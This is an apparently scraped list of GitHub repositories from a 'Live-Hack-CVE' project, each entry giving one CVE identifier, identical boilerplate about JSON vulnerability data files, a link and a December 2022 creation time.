**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-23582 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-23582](https://github.com/Live-Hack-CVE/CVE-2020-23582) create time: 2022-12-23T14:59:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-23583 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-23583](https://github.com/Live-Hack-CVE/CVE-2020-23583) create time: 2022-12-23T14:56:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-23585 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-23585](https://github.com/Live-Hack-CVE/CVE-2020-23585) create time: 2022-12-23T14:56:26Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-23593 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-23593](https://github.com/Live-Hack-CVE/CVE-2020-23593) create time: 2022-12-23T14:56:15Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-23584 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-23584](https://github.com/Live-Hack-CVE/CVE-2020-23584) create time: 2022-12-23T14:56:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-23586 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-23586](https://github.com/Live-Hack-CVE/CVE-2020-23586) create time: 2022-12-23T14:56:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-23587 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-23587](https://github.com/Live-Hack-CVE/CVE-2020-23587) create time: 2022-12-23T14:56:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-23588 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-23588](https://github.com/Live-Hack-CVE/CVE-2020-23588) create time: 2022-12-23T14:56:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-23589 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-23589](https://github.com/Live-Hack-CVE/CVE-2020-23589) create time: 2022-12-23T14:55:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-23590 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-23590](https://github.com/Live-Hack-CVE/CVE-2020-23590) create time: 2022-12-23T14:55:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-23591 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-23591](https://github.com/Live-Hack-CVE/CVE-2020-23591) create time: 2022-12-23T14:55:50Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-23592 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-23592](https://github.com/Live-Hack-CVE/CVE-2020-23592) create time: 2022-12-23T14:55:47Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-28975 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-28975](https://github.com/Live-Hack-CVE/CVE-2020-28975) create time: 2022-12-23T14:54:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3632 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3632](https://github.com/Live-Hack-CVE/CVE-2021-3632) create time: 2022-12-23T15:01:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-45346 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-45346](https://github.com/Live-Hack-CVE/CVE-2021-45346) create time: 2022-12-23T15:01:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-20609 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-20609](https://github.com/Live-Hack-CVE/CVE-2021-20609) create time: 2022-12-23T14:55:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-20611 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-20611](https://github.com/Live-Hack-CVE/CVE-2021-20611) create time: 2022-12-23T14:54:47Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-20610 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-20610](https://github.com/Live-Hack-CVE/CVE-2021-20610) create time: 2022-12-23T14:54:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-40491 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-40491](https://github.com/Live-Hack-CVE/CVE-2021-40491) create time: 2022-12-23T14:54:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-46854 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-46854](https://github.com/Live-Hack-CVE/CVE-2021-46854) create time: 2022-12-23T14:52:36Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3563 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3563](https://github.com/Live-Hack-CVE/CVE-2021-3563) create time: 2022-12-23T14:19:13Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-35246 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-35246](https://github.com/Live-Hack-CVE/CVE-2021-35246) create time: 2022-12-23T14:18:13Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-25220 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-25220](https://github.com/Live-Hack-CVE/CVE-2021-25220) create time: 2022-12-23T14:18:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-35284 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-35284](https://github.com/Live-Hack-CVE/CVE-2021-35284) create time: 2022-12-23T14:17:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4096 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4096](https://github.com/Live-Hack-CVE/CVE-2022-4096) create time: 2022-12-23T15:02:26Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3720 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3720](https://github.com/Live-Hack-CVE/CVE-2022-3720) create time: 2022-12-23T15:01:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41788 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41788](https://github.com/Live-Hack-CVE/CVE-2022-41788) create time: 2022-12-23T15:01:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-44785 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-44785](https://github.com/Live-Hack-CVE/CVE-2022-44785) create time: 2022-12-23T15:01:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-45535 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-45535](https://github.com/Live-Hack-CVE/CVE-2022-45535) create time: 2022-12-23T15:01:43Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-44787 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-44787](https://github.com/Live-Hack-CVE/CVE-2022-44787) create time: 2022-12-23T15:01:40Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-44786 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-44786](https://github.com/Live-Hack-CVE/CVE-2022-44786) create time: 2022-12-23T15:01:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-45536 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-45536](https://github.com/Live-Hack-CVE/CVE-2022-45536) create time: 2022-12-23T15:01:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-44788 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-44788](https://github.com/Live-Hack-CVE/CVE-2022-44788) create time: 2022-12-23T15:01:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40842 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40842](https://github.com/Live-Hack-CVE/CVE-2022-40842) create time: 2022-12-23T15:01:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-45331 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-45331](https://github.com/Live-Hack-CVE/CVE-2022-45331) create time: 2022-12-23T15:01:23Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-45330 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-45330](https://github.com/Live-Hack-CVE/CVE-2022-45330) create time: 2022-12-23T15:01:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39181 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39181](https://github.com/Live-Hack-CVE/CVE-2022-39181) create time: 2022-12-23T15:01:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-29275 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-29275](https://github.com/Live-Hack-CVE/CVE-2022-29275) create time: 2022-12-23T15:01:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-24939 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-24939](https://github.com/Live-Hack-CVE/CVE-2022-24939) create time: 2022-12-23T15:01:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-30283 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-30283](https://github.com/Live-Hack-CVE/CVE-2022-30283) create time: 2022-12-23T15:00:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41909 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41909](https://github.com/Live-Hack-CVE/CVE-2022-41909) create time: 2022-12-23T15:00:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41911 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41911](https://github.com/Live-Hack-CVE/CVE-2022-41911) create time: 2022-12-23T15:00:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41685 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41685](https://github.com/Live-Hack-CVE/CVE-2022-41685) create time: 2022-12-23T15:00:47Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-44740 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-44740](https://github.com/Live-Hack-CVE/CVE-2022-44740) create time: 2022-12-23T15:00:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3763 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3763](https://github.com/Live-Hack-CVE/CVE-2022-3763) create time: 2022-12-23T15:00:40Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-30771 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-30771](https://github.com/Live-Hack-CVE/CVE-2022-30771) create time: 2022-12-23T15:00:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40746 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40746](https://github.com/Live-Hack-CVE/CVE-2022-40746) create time: 2022-12-23T15:00:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-30772 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-30772](https://github.com/Live-Hack-CVE/CVE-2022-30772) create time: 2022-12-23T15:00:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-29279 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-29279](https://github.com/Live-Hack-CVE/CVE-2022-29279) create time: 2022-12-23T15:00:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-1579 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-1579](https://github.com/Live-Hack-CVE/CVE-2022-1579) create time: 2022-12-23T15:00:03Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41885 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41885](https://github.com/Live-Hack-CVE/CVE-2022-41885) create time: 2022-12-23T15:00:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41655 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41655](https://github.com/Live-Hack-CVE/CVE-2022-41655) create time: 2022-12-23T14:59:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41643 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41643](https://github.com/Live-Hack-CVE/CVE-2022-41643) create time: 2022-12-23T14:59:53Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3618 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3618](https://github.com/Live-Hack-CVE/CVE-2022-3618) create time: 2022-12-23T14:59:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-2000 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-2000](https://github.com/Live-Hack-CVE/CVE-2022-2000) create time: 2022-12-23T13:35:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2009-1143 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2009-1143](https://github.com/Live-Hack-CVE/CVE-2009-1143) create time: 2022-12-23T14:17:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2009-1142 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2009-1142](https://github.com/Live-Hack-CVE/CVE-2009-1142) create time: 2022-12-23T14:17:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2011-3389 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2011-3389](https://github.com/Live-Hack-CVE/CVE-2011-3389) create time: 2022-12-23T13:36:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-13755 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-13755](https://github.com/Live-Hack-CVE/CVE-2017-13755) create time: 2022-12-23T13:33:50Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-13760 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-13760](https://github.com/Live-Hack-CVE/CVE-2017-13760) create time: 2022-12-23T13:33:47Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-13756 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-13756](https://github.com/Live-Hack-CVE/CVE-2017-13756) create time: 2022-12-23T13:33:15Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-3855 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-3855](https://github.com/Live-Hack-CVE/CVE-2018-3855) create time: 2022-12-23T14:12:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-3862 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-3862](https://github.com/Live-Hack-CVE/CVE-2018-3862) create time: 2022-12-23T14:12:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-3846 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-3846](https://github.com/Live-Hack-CVE/CVE-2018-3846) create time: 2022-12-23T14:11:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-10771 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-10771](https://github.com/Live-Hack-CVE/CVE-2018-10771) create time: 2022-12-23T14:11:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-3847 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-3847](https://github.com/Live-Hack-CVE/CVE-2018-3847) create time: 2022-12-23T14:11:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-10753 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-10753](https://github.com/Live-Hack-CVE/CVE-2018-10753) create time: 2022-12-23T14:11:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-2771 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-2771](https://github.com/Live-Hack-CVE/CVE-2018-2771) create time: 2022-12-23T13:39:13Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-1108 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-1108](https://github.com/Live-Hack-CVE/CVE-2018-1108) create time: 2022-12-23T13:34:03Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-19497 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-19497](https://github.com/Live-Hack-CVE/CVE-2018-19497) create time: 2022-12-23T13:33:57Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-1010069 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-1010069](https://github.com/Live-Hack-CVE/CVE-2019-1010069) create time: 2022-12-23T14:11:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-1010065 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-1010065](https://github.com/Live-Hack-CVE/CVE-2019-1010065) create time: 2022-12-23T13:34:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-18928 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-18928](https://github.com/Live-Hack-CVE/CVE-2019-18928) create time: 2022-12-23T13:33:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-13362 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-13362](https://github.com/Live-Hack-CVE/CVE-2020-13362) create time: 2022-12-23T14:11:03Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-13361 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-13361](https://github.com/Live-Hack-CVE/CVE-2020-13361) create time: 2022-12-23T14:10:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-10704 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-10704](https://github.com/Live-Hack-CVE/CVE-2020-10704) create time: 2022-12-23T14:10:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-10685 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-10685](https://github.com/Live-Hack-CVE/CVE-2020-10685) create time: 2022-12-23T14:10:53Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-5752 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-5752](https://github.com/Live-Hack-CVE/CVE-2020-5752) create time: 2022-12-23T14:10:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-15113 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-15113](https://github.com/Live-Hack-CVE/CVE-2020-15113) create time: 2022-12-23T14:10:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-14344 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-14344](https://github.com/Live-Hack-CVE/CVE-2020-14344) create time: 2022-12-23T14:10:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-16164 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-16164](https://github.com/Live-Hack-CVE/CVE-2020-16164) create time: 2022-12-23T14:10:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-12845 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-12845](https://github.com/Live-Hack-CVE/CVE-2020-12845) create time: 2022-12-23T14:09:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-26185 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-26185](https://github.com/Live-Hack-CVE/CVE-2020-26185) create time: 2022-12-23T13:39:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-35163 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-35163](https://github.com/Live-Hack-CVE/CVE-2020-35163) create time: 2022-12-23T13:39:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-29508 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-29508](https://github.com/Live-Hack-CVE/CVE-2020-29508) create time: 2022-12-23T13:39:23Z

